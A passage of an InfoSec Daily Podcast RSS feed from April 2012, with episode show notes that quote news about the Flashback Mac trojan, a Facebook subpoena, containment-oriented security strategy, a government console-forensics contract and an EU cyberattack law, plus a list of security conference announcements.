<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Web tool checks if your Mac is Flashback-free: </span><a href="http://news.cnet.com/8301-27076_3-57410654-248/web-tool-checks-if-your-mac-is-flashback-free/"><span>http://news.cnet.com/8301-27076_3-57410654-248/web-tool-checks-if-your-mac-is-flashback-free/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Mac Flashback Trojan: Find Out If You&rsquo;re One of the 600,000 Infected: </span><a href="http://gizmodo.com/5899352/mac-flashback-trojan-find-out-if-youre-one-of-the-600000-infected"><span>http://gizmodo.com/5899352/mac-flashback-trojan-find-out-if-youre-one-of-the-600000-infected</span></a><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&#8230;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://blog.thephoenix.com/blogs/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx"><span>http://blog.thephoenix.com/blogs/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx</span></a><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">One of the most fascinating documents we came across was the BPD&#039;s subpoena of Philip Markoff&#039;s Facebook information. It&#039;s interesting for a number of reasons &#8212; for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they&#039;ve served. Social-networking data is a contested part of a complicated legal ecosystem &#8212; in some cases, courts have found that such data is protected by the Stored Communications Act.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">In fact, we&#039;d never seen an executed Facebook subpoena before &#8212; but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which includes text printouts of Markoff&#039;s wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we&#039;ve redacted), and a long table of login and IP data. </span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information. And while the police were evidently comfortable releasing Markoff&#039;s unredacted Facebook subpoena, we weren&#039;t. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook ID&#039;s were part of the document. So we took the additional step of redacting as much identifying information as we could &#8212; knowing that any redaction we performed would be imperfect, but believing that there&#039;s a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. &nbsp;</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">As far as we can tell, nobody&#039;s ever seen what one of these looks like &#8212; and we&#039;re hoping the social media, law, and privacy experts out there can glean insight from it: </span><br />
	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/232800395/?itc=edit_stub%20OR%20&amp;itc=edit_stub"><span>http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/232800395/?itc=edit_stub%20OR%20&amp;itc=edit_stub</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Any Defense contractor &#8212; and now, a few security vendors &#8212; can tell you that even the best security technology and expertise can&#039;t stop a well-funded and determined attacker.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">That new reality, which has been building for several years starting in the military sector, has shifted the focus from trying to stop attackers at the door to instead trying to lessen the impact of an inevitable hack. The aim is to try to detect an attack as early in its life cycle as possible and to quickly put a stop to any damage, such as extricating the attacker from your data server &#8212; or merely stopping him from exfiltrating sensitive information.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">It&#039;s more about containment now, security experts say. Relying solely on perimeter defenses is now passe &#8212; and naively dangerous. &quot;Organizations that are only now coming to the realization that their network perimeters have been compromised are late to the game. Malware ceased being obvious and destructive years ago,&quot; says Dave Piscitello, senior security technologist for ICANN. &quot;The criminal application of collected/exfiltrated data is now such an enormous problem that it&#039;s impossible to avoid.&quot;</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Attacks have become more sophisticated, and social engineering is a powerful, nearly sure-thing tool for attackers to schmooze their way into even the most security-conscious companies. &quot;Security traditionally has been a preventative game, trying to prevent things from happening. What&#039;s been going on is people realizing you cannot do 100 percent prevention anymore,&quot; says Chenxi Wang, vice president and principal analyst for security and risk at Forrester Research. &quot;So we figured out what we&#039;re going to do is limit the damage when prevention fails.&quot;</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">There are certain types of attackers you cannot prevent from getting in if they are determined to do so, says Richard Bejtlich, chief security officer at Mandiant Security. &quot;They will get into your company, but that doesn&#039;t mean you should give up,&quot; he says.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">For organizations like the military that are constantly under siege by cyberattackers, this is nothing new. </span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&quot;Twenty years ago, we thought we could keep these guys out,&quot; Bejtlich says. But the Air Force was the first to realize that was not the case after it began instrumenting its networks with custom sensors to detect the attackers, he says. The Air Force quickly realized it wasn&#039;t so much a matter of keeping them out, but finding them as quickly as possible and extricating them, he says.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&quot;The military changed from [a strategy] of prevention to one of hunting,&quot; Bejtlich says. &quot;This sort of idea has not been widespread.&quot;</span><br />
	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span><span><br class="kix-line-break" /></p>
<p>	</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://searchsecurity.techtarget.com/news/2240147964/Industry-is-doomed-by-automation-misguided-IT-security-strategy-experts-warn"><span>http://searchsecurity.techtarget.com/news/2240147964/Industry-is-doomed-by-automation-misguided-IT-security-strategy-experts-warn</span></a></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Several security industry heavyweights flexed their muscle and star power to warn attendees of the 2012 InfoSec World Conference and Expo that relying on technology alone to secure networks is a damning </span><a href="http://searchsecurity.techtarget.com/tip/Information-security-intelligence-demands-network-traffic-visibility"><span>IT security strategy</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">.</span></b></p>
<p><b><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">The security luminaries &#8212; Marcus Ranum, CSO of Columbia, Md.-based Tenable Network Security Inc.; Chris Nickerson, founder and principal security consultant at Lares Consulting in Denver; and Alex Hutton, a former risk analyst at Verizon and currently director of operational risk at a financial institution &#8212; didn&#039;t mince words. They told attendees they are failing at securing their networks and will continue to fail if they don&#039;t shed their compliance mentality, understand how their business works, and become more </span><a href="http://searchsecurity.techtarget.com/news/2240131676/Hacking-back-puts-security-on-the-offensive"><span>proactive about security</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">. Instead of buying another appliance to automate security processes, the panelists said CISOs should figure out what their company&rsquo;s core assets are, and hire and train talented people to analyze their system logs and protect the data at the heart of the company.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&ldquo;This stuff isn&rsquo;t rocket science; it&rsquo;s about attention to detail,&rdquo; Ranum said. &ldquo;The security industry has a tendency of moving something from having smart people to dumb processes&hellip; Big data is not going to save you it&rsquo;s the people examining your big data that are going to save you.&rdquo;</span><br />
	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://www.zdnet.com/blog/security/us-government-hires-company-to-hack-into-video-game-consoles/11395"><span>http://www.zdnet.com/blog/security/us-government-hires-company-to-hack-into-video-game-consoles/11395</span></a></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The U.S. government recently posted a project asking for the &ldquo;Development of Tools for Extracting Information from Video Game Systems.&rdquo; The listing was posted just two months ago, and last week a contract was signed with the California-based company Obscure Technologies. The U.S. is willing to pay $177,237.50 for the job.</span></b></p>
<p><b><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Obscure Technologies will have to perform the following online monitoring tasks:</span></b></p>
<ul style="margin-top: 0pt;margin-bottom: 0pt">
<li><b><span style="vertical-align: baseline">Provide monitoring for 6 new video game systems, a maximum of 2 of any type from any given vendor.</span></b></li>
<li><b><span style="vertical-align: baseline">Generate clean data (data that does not contain any identifiable information from real people) from new video game systems.</span></b></li>
<li><b><span style="vertical-align: baseline">Design a prototype rig for capturing data from new video game systems.</span></b></li>
<li><b><span style="vertical-align: baseline">Implement the prototype rig on the new video game systems.</span></b></li>
<li><b><span style="vertical-align: baseline">Provide data captured by the prototype rig in the following formats: Packets shall be delivered in PCAP format, Disk images shall be delivered in E01/EWF format.</span></b></li>
<li><b><span style="vertical-align: baseline">Write a final report, between 10 and 20 pages, to include details of work performed, the engineering approach used and the reason why, any engineering decisions that were made and why, what work remains to be done, and any failings of the approaches followed.</span></b></li>
</ul>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">It will also be required to implement the following offline monitoring tasks:</span></b></p>
<ul style="margin-top: 0pt;margin-bottom: 0pt">
<li><b><span style="vertical-align: baseline">Provide used video games systems purchased on the open market.</span></b></li>
<li><b><span style="vertical-align: baseline">Used systems provided shall be likely to contain data from previous users.</span></b></li>
<li><b><span style="vertical-align: baseline">Extend tool development to implement creating signatures over sections.</span></b></li>
<li><b><span style="vertical-align: baseline">Survey console chat room technology and identify potential chokepoints where data may be committed to storage.</span></b></li>
<li><b><span style="vertical-align: baseline">Identify data storage points on used video game systems and attempt to demonstrate proof of concept.</span></b></li>
<li><b><span style="vertical-align: baseline">Extract real data from used video game systems.</span></b></li>
</ul>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-640-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3742/0/infosec-daily-podcast-episode-640.mp3" length="18662271" type="audio/mpeg" />
		<itunes:duration>0:38:53</itunes:duration>
		<itunes:subtitle>Episode 640 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 640 for April 7, 2012. Tonight&#039;s podcast is hosted by Dr. Bonez.

	
Guests: aricon, connection, hackett, oncee and spridel
&#160;
Announcements:
Outerz0ne 8
	When:[...]</itunes:subtitle>
		<itunes:summary>Episode 640 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 640 for April 7, 2012. Tonight&#039;s podcast is hosted by Dr. Bonez.

	
Guests: aricon, connection, hackett, oncee and spridel
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 

	
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/

	
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/

	
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org

	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training

	
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

	
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com

	
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 

	
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.

	
You don't have a sufficient version of Flash Player to display this animation.

	
Stories
Source:
http://www.theverge.com/2012/4/4/2925221/european-union-law-it-attack-criminal-offence
European Union legislators have approved a draft law that would make cyber attacks on IT systems a criminal offense, punishable by at least two years in prison. The proposed law is an update to an existing one, and would also prohibit anyone from producing or selling the kinds of programs that can be used for these attacks &#8212; essentially making it impossible for a company to make software that could be used to test its own security, since it could also be used to attack others. While the penalty for these offenses would start at two years, in cases involving &#34;aggravating circumstances&#34; (i.e. a large-scale attack that causes plenty of financial damage), the sentence would be at least five years. The EU voted overwhelmingly in favor of the law, with 50 votes for as opposed to just one against, and a final decision is expected to be made over the summer.

	
comment by aricon: This is a lot like the german law passed a few years ago which saw a significant amount of brain drain in the security community there. &#160;What will other EU countries do when they have even less security knowledge to draw upon in order to compete?
&#8230;
Source: http://www.pcworld.com/businesscenter/article/253403/mac_malware_outbreak_is_bigger_than_conficker.html
&#039;An estimated 600,000 or more Macs are currently compromised and part of a massive botnet thanks to the Flashback Trojan. To put the size of the threat in some perspective, the Flashback Trojan botnet is even bigger than the massive Conficker botnet&#8230;relatively speaking.

	
The Conficker botnet compromised an estimated seven million plus Windows PCs around the world at its peak. Seven million is obviously much larger than 600,000, but Windows also has a significantly higher number of PCs in use around the world.

	According to current data from Net Applications, Mac OS X is the number two des[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 639 &#8211; CCITTFax, LulzSec/Anonymous Tactics, CEIEC, Flashback, and #OpTrialAtHome</title>
		<link>http://www.isdpodcast.com/episode-639-ccittfax-lulzsecanonymous-tactics-ceiec-flashback-and-optrialathome</link>
		<comments>http://www.isdpodcast.com/episode-639-ccittfax-lulzsecanonymous-tactics-ceiec-flashback-and-optrialathome#comments</comments>
		<pubDate>Sat, 07 Apr 2012 00:54:23 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3738</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 639 for April 6, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.634429249979837" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 639 for April 6, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
